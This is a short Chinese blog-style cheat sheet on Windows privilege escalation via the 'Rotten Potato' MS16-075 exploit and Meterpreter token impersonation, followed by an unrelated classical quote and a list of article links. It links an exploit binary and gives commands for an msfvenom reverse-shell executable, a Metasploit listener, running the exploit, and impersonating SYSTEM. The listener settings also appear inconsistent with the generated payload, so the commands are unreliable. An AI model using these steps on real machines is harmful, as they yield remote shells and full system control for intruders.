Bootstrap

烂土豆+令牌窃取提权

烂土豆+令牌窃取提权(win2008及之前可以直接使用令牌窃取提权)

potato.exe:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe

# 1.生成shell上传到目标主机
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.150 LPORT=4433 -f exe -o 4433.exe

# 2.开启msf
use /multi/handler
set rhost 127.0.0.1(本机ip)
set rport	4433(本机端口)
set payload windows/meterpreter_reverse_tcp
# 3.加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
use incognito
execute -cH -f c:/potato.exe
# 4.列出目标机器用户的可用令牌,并使用system权限
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# 5.查看权限
getuid

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

最新收录
SpringBoot整合MyBatis,入门教程,细节无敌,不能错过
使用VMware 16 安装银河麒麟V10 --九五小庞
【Go系列】模块和协同开发
关于ABAP选择屏幕部分,定义框架与不定义框架两种写法
数据传输安全
Linux知识总结
H5APP WEB 支付开发 (银联 微信 支付宝)流程
数据库原理-关系模式的规范化
JavaWeb开发——JSP技术
企业级监控系统Zabbix
;